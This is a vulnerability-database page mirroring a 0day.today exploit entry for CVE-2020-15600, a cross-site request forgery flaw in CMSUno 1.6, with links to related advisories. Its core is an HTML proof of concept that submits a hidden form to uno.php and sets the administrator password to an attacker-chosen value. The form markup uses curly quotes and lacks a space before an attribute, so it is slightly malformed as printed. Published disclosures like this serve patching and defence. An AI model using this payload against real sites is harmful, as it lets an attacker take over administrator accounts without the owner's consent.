Lucene search
K

CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password) Vulnerability

🗓️ 17 Jul 2020 00:00:00Reported by nothType 
zdt
 zdt
🔗 0day.today👁 485 Views

CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password) Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
CNVD
CMSUno Cross-Site Request Forgery Vulnerability
8 Jul 202000:00
cnvd
CVE
CVE-2020-15600
7 Jul 202021:17
cve
Cvelist
CVE-2020-15600
7 Jul 202021:17
cvelist
EUVD
EUVD-2020-7587
7 Oct 202500:30
euvd
NVD
CVE-2020-15600
7 Jul 202022:15
nvd
Packet Storm
CMSUno 1.6 Cross Site Request Forgery
17 Jul 202000:00
packetstorm
Prion
Cross site request forgery (csrf)
7 Jul 202022:15
prion
RedhatCVE
CVE-2020-15600
22 May 202515:14
redhatcve
# Exploit Title: CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)
# Exploit Author: Noth
# Vendor Homepage: https://github.com/boiteasite/cmsuno
# Software Link: https://github.com/boiteasite/cmsuno
# Version: v1.6
# CVE : 2020-15600

An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password.

PoC : 

<html>
<body>
<script>history.pushState(",",'/')</script>
<form action=“http://127.0.0.1/cmsuno-master/uno.php”method=“POST”>
<input type=“hidden” name=“user” value=“admin”/>
<input type=“hidden” name=“pass” value=“yourpassword”/>
<input type=“submit” name=“user” value=“Submit request”/>
</form>
</body>
</html>

#  0day.today [2020-07-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation